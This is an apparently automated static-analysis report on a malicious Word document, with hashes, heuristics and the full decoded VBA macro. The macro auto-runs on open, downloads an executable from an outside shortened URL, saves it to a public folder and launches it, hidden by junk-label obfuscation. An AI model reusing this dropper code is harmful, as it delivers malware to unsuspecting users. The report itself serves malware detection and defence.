Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa7e0a35dc579756…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 145.0 KB
Created: 2020-08-08 20:20:00
Authoring application: Microsoft Office Word
First seen: 2020-09-15
MD5: 52e74e283b5eb5379b7e1e449ed62843
SHA-1: 559d2020fd3001dd54aea1e1d63ab0d1baac7ecd
SHA-256: fa7e0a35dc579756e574a23f1c780af6b7ab12210e98036370bf45bc09bc5015
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is a Word document containing a heavily obfuscated VBA macro. The macro's AutoOpen subroutine calls a function that attempts to download a file from the URL 'http://rebrand.ly/ohxnqak', save it as 'C:\Users\Public\crscss.exe', and then run it via Shell. This indicates downloader/dropper functionality whose aim is to execute a second-stage payload.

Heuristics (9)

  • VBA macros detected [medium] (5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
        Shell "C:\Users\Public\crscss.exe"
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        objStream.Write objReq.ResponseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set objReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
      • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
      • http://rebrand.ly/ohxnqak (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   6840 bytes
SHA-256: 5b8f04e8b7b105d9f98d81dbc3daf9a186b954c278eb7ef74b3dba9d9684f1fb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
159 of 219 identifiers look randomly generated (e.g. 'SliFpzFBNefACLjQtJqwYMsoonsdVdHiTknqiGk') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
GoTo TmjGqAGCOf:
yOelnwTOsubh:
xfTofUjtccOPqzLoH = "Kdpd"
GoTo BDMkRvKrxQZ:
VuMmMYRkSqakq:
yajvQrVuMmMYRkSqa = "qmy"
GoTo yOelnwTOsubh
PpEwhOQlNSgdLZyyajvQ:
QnIiaVhyNjQgDyceKeks = "MVQ"
GoTo VuMmMYRkSqakq
ekshMVQUaxDKpCBRV:
tNhbQwFGEJunuZm = "BEHz"
GoTo PpEwhOQlNSgdLZyyajvQ
wHBTQnIiaVhyNjQgDyce:
jUlorjHlPzvkEvmzJss = "RtP"
GoTo ekshMVQUaxDKpCBRV
CPavIwiJgfGoFrv:

GoTo wHBTQnIiaVhyNjQgDyce
unuZmlBEHzZngQyAU:
Call XXZZSSOOOEHUEUIEGIUERFIUGEFEFBFYFBIUWR
GoTo CPavIwiJgfGoFrv
iLbtNhbQwFGE:
OfgBDMkRvKrxQZOupp = "teQe"
GoTo unuZmlBEHzZngQyAU
pbfFtqlCAQsQQSfiwSTd:
qYpbfFtqlCAQsQQ = "fiwSTdniL"
GoTo iLbtNhbQwFGE
vkEvmzJssgRtPcq:
ngQyAUxCPavIwiJgfGoF = "vVwHB"
GoTo pbfFtqlCAQsQQSfiwSTd
uppoteQeIjUlorjHlP:
axDKpCBRVYPpEwhOQlNS = "dLZ"
GoTo vkEvmzJssgRtPcq
TmjGqAGCOf:
elnwTOsubhAIxdZZYdN = "csSRiYbSrU"
GoTo uppoteQeIjUlorjHlP

BDMkRvKrxQZ:
End Sub
Sub XXZZSSOOOEHUEUIEGIUERFIUGEFEFBFYFBIUWR()
If vCENlg("http://rebrand.ly/ohxnqak", "C:\Users\Public\crscss.exe") = True Then
GoTo jdvsOkJOLQap:
faaZeOHOtTFVZcT:
jbAdHsncwnerBlk = "JlHTiPhSQx"
GoTo LUfaDSmFZTIoxywBm:
TrblrnzPQmoxUCfvciBJ:
rDgzfCUhURLecyis = "uGYYuv"
GoTo faaZeOHOtTFVZcT
OFTeMMzAbkwZsQvNZNKE:
iRcieqGVdfoLGkmSZsA = "VQQP"
GoTo TrblrnzPQmoxUCfvciBJ
EMdDCSILDcFkiPE:
OYvqTVCVckZENOM = "pvDhutJNP"
GoTo OFTeMMzAbkwZsQvNZNKE
jzOVYhEzdfLRltiNJJIM:
mfmQedtxzrQgYIqsMp = "HSnAo"
GoTo EMdDCSILDcFkiPE
wQxICUDbKUb:

GoTo jzOVYhEzdfLRltiNJJIM
VyDQNwJjjKSgHcG:
GoTo wQxICUDbKUb
KiovanmCGIAaphRz:
    Shell "C:\Users\Public\crscss.exe"
GoTo VyDQNwJjjKSgHcG
TGQojMOvOUdRxGH:
sOkJOLQapKLUfaDSm = "ZTIoxyw"
GoTo KiovanmCGIAaphRz
PrZqcgGhsmEBYtSKGRj:
BYQygxkoNoztLIf = "aRNaqF"
GoTo TGQojMOvOUdRxGH
lFinAKgthSu:
hwoZGIeGKZUDRqrRbn = "jNmEeEPJc"
GoTo PrZqcgGhsmEBYtSKGRj
tYkkzDGxQmfO:
FMTkKJaPSKjMrpQLgQNb = "TTHH"
GoTo lFinAKgthSu
jdvsOkJOLQap:
cJnCjpIQGmhiglVOVA = "Md"
GoTo tYkkzDGxQmfO

LUfaDSmFZTIoxywBm:
End If
End Sub
Public Function vCENlg(URL, path) As Boolean
 On Error GoTo errorhandle:
   Dim objReq
   Dim objStream
GoTo BhEQjQUOheA:
bjwYrQvMnMYRkTq:
TRQHOVmMMcSUMmOtrZNi = "PdoQVJJltF"
GoTo vAxIabwxGfLp:
ExhPRmOTheMaz:
yrbILgIMbQGTttTd = "RlQo"
GoTo bjwYrQvMnMYRkTq
xELqDCSVZQ:
PswKUpDqdDaZBiAmq = "qBvNKhDcT"
GoTo ExhPRmOTheMaz
eKfksiNQQV:
sZrdhGvsmEBYuSZ = "gkyTUfojMd"
GoTo xELqDCSVZQ
TPcsHdQaxs:
EOmSwLszRaPvqrpufZ = "JlV"
GoTo eKfksiNQQV
AmqPqBvNKhD:

GoTo TPcsHdQaxs
uPswKUpDqdDaZB:
   objReq.Send
GoTo AmqPqBvNKhD
DoipSgfvzCtSiaK:
   objReq.Open "GET", URL, False
GoTo uPswKUpDqdDaZB
ZcrMNYhcFUoHbVKqzA:
   Set objReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
GoTo DoipSgfvzCtSiaK
VaznlfxuQnLR:
lveeQQsANpIoMeqecVol = "rCIEPhi"
GoTo ZcrMNYhcFUoHbVKqzA
uEnmaMnJVkR:
qtkJmRBxlGwnBLuu = "TuQ"
GoTo VaznlfxuQnLR
jldCfJuqeyp:
PjdSyHHFKwpwbnnCG = "tSiaKs"
GoTo uEnmaMnJVkR
lrKSIojkinYQZCeO:
csHdQaxsVYEZemcHPQO = "ryFkwwLPSJ"
GoTo jldCfJuqeyp
BhEQjQUOheA:
gGRLeNkTekgsJYghqN = "moUbuCsY"
GoTo lrKSIojkinYQZCeO

vAxIabwxGfLp:
   If objReq.Status = 200 Then
GoTo VGNUlLLbRTLlNsqYMhY:
zvkEulzJssfRtPcqYp:
alrnyPemnxUPtubi = "BrQRS"
GoTo cnVUIIksEhAgDViVTN:
ZNtppnseQeIjUkorjHl:
izNjQgEzceKfksiNQQVb = "ELqDCS"
GoTo zvkEulzJssfRtPcqYp
pAGCNfgBDMkQuKrx:
cRxGGFJvovammCF = "AZohQyBV"
GoTo ZNtppnseQeIjUkorjHl
jtccOOqyLnHmKcodaTmj:
lpskImQAwlFvmAKttgSu = "drZqcgFur"
GoTo pAGCNfgBDMkQuKrx
QcNTbrSRiYbRrTzxfToe:
kuddPPrzMoInLdpebUnk = "qBHDOgh"
GoTo jtccOOqyLnHmKcodaTmj
wTOstahzHxdY:

GoTo QcNTbrSRiYbRrTzxfToe
MjSejfrIQf:
       vCENlg = True
GoTo wTOstahzHxdY
oQkPnFfFQK:
       Set objStream = Nothing
GoTo MjSejfrIQf
aHKfHLaVFSssS:
       objStream.Close
GoTo oQkPnFfFQK
dlbGOPNSqxEjvvKORIix:
       objStream.SaveToFile path, 2
GoTo aHKfHLaVFSssS
rGcPZwrUQD:
       objStream.Position = 0
GoTo dlbGOPNSqxEjvvKORIix
pOpAuMJgCbSO:
       objStream.Write objReq.ResponseBody
GoTo rGcPZwrUQD
rtOrvJToCpcCZYAhz:
       objStream.Type = 1
GoTo pOpAuMJgCbSO
oRfeuyBsRhZ:
       objStream.Open
GoTo rtOrvJToCpcCZYAhz
bqLMQgbETnHaUJpyzxCn:
       Set objStream = CreateObject("ADODB.Stream")
GoTo oRfeuyBsRhZ
LmIUkQiUZymkewtPmKQM:
tubiAIyeZaYdOUcsTSj = "cSsUAygUpf"
GoTo bqLMQgbETnHaUJpyzxCn
BdNeikcBeItpdxoftDml:
ENlRvLsyRaOuqqotfY = "Jk"
GoTo LmIUkQiUZymkewtPmKQM
eKoDkqJRHnijhmQP:
DAYtRYTgjxSUeoiL = "uO"
GoTo BdNeikcBeItpdxoftDml
dzjuzwHZavw:
CQbwJwjKhfHpGswVw = "BTQoJia"
GoTo eKoDkqJRHnijhmQP
VGNUlLLbRTLlNsqYMhY:
ZQpExhPRmOTheMazzbjw = "rQvMnMYRkT"
GoTo dzjuzwHZavw

cnVUIIksEhAgDViVTN:
   Else
GoTo GdyQdZloDZajtoRhz:
SliFpzFBNefACLjQtJqw:
BqKBsFPzymYzViwevh = "Lzxr"
GoTo niQCLMKPAtAfsrHLNFf:
bbNNpyKmGlJcnc:
RuNtQjvjgaspMwGMIU = "mHJS"
GoTo SliFpzFBNefACLjQtJqw
ZxbFDlaulcp:
qmxOdlmwTOstahzH = "dYZQcN"
GoTo bbNNpyKmGlJcnc
yAhnGODjffejTbiyZYoe:
JejrhMVVUawDKpC = "RUYPoD"
GoTo ZxbFDlaulcp
ZwgqwsEUkrtCa:
zYngPxAUxBPavIviJg = "Go"
GoTo yAhnGODjffejTbiyZYoe
pBdxcASsSeY:

GoTo ZwgqwsEUkrtCa
KCnUQrTZnjRfEF:
       vCENlg = False
GoTo pBdxcASsSeY
kqynScdbgDJRvIHYceV:
SfiwRTdnhKbtNhbQwFFE = "unuZmlBE"
GoTo KCnUQrTZnjRfEF
PogcoETpdmJEik:
rvUvGASPnIhaVhyMiV = "Dyb"
GoTo kqynScdbgDJRvIHYceV
lMuLxBcCNHaQ:
gOQlNSgdLZyyaivQq = "uLmLQQjSpZ"
GoTo PogcoETpdmJEik
mQEGbDIVhBOCoP:
brSRiYbRrTzxfToeUjtc = "VVw"
GoTo lMuLxBcCNHaQ
GdyQdZloDZajtoRhz:
YBQxDQfUAvvuzkdk = "pbruxpNrV"
GoTo mQEGbDIVhBOCoP

niQCLMKPAtAfsrHLNFf:
   End If
GoTo faCSlFZSIoxxwBmfmQed:
ByUrPURdgvQ:
kkQJlHTiPhSQwlicur = "kIOKQaoJL"
GoTo wzrPfYHqsMpuHR:
ePrNaoVnZdDrp:
qTyweSndTisbbNNpyKmG = "Jcnc"
GoTo ByUrPURdgvQ
cGhSjnphGjNytiCtkxIr:
kMRfcKYxxZhuVqUtKlL = "QjRoYjplwN"
GoTo ePrNaoVnZdDrp
CjpIQFlhhglV:
FnEquUuGARPmHgZ = "gxLiUfCxbc"
GoTo cGhSjnphGjNytiCtkxIr
syuGQYtvEcI:
spjByVrPVRehvQScmh = "asMgaPvE"
GoTo CjpIQFlhhglV
zeCUgURLeby:

GoTo syuGQYtvEcI
KjMrpQLgVMblTTGGiqD:
vCENlg = False
GoTo zeCUgURLeby
GVdfoLGkmSZsAUQQOTFLSkKJaP:
errorhandle:
GoTo KjMrpQLgVMblTTGGiqD
EPJcKhQcie:
   Exit Function
GoTo GVdfoLGkmSZsAUQQOTFLSkKJaP
dFKYUDQqqRanOjNmD:
   Set objReq = Nothing
GoTo EPJcKhQcie
utJMPHgvoZG:
OyujDukyIrreQsOb = "Qoae"
GoTo dFKYUDQqqRanOjNmD
YvqTUBVbjZENOMRpvC:
DItmtYlkADGyQmfOxz = "wBOZuHvhIf"
GoTo utJMPHgvoZG
ysKIfAZRNZqEa:
diqgLUVTZwCJoBAQTQO = "CvgN"
GoTo YvqTUBVbjZENOMRpvC
AoaBYQygxjnN:
kmvSNrtagzHwcYY = "bMSarRQhQa"
GoTo ysKIfAZRNZqEa
faCSlFZSIoxxwBmfmQed:
SliFpzFBNefACLjQtJqwYMsoonsdVdHiTknqiGk = "rncwmdr"
GoTo AoaBYQygxjnN

wzrPfYHqsMpuHR:
End Function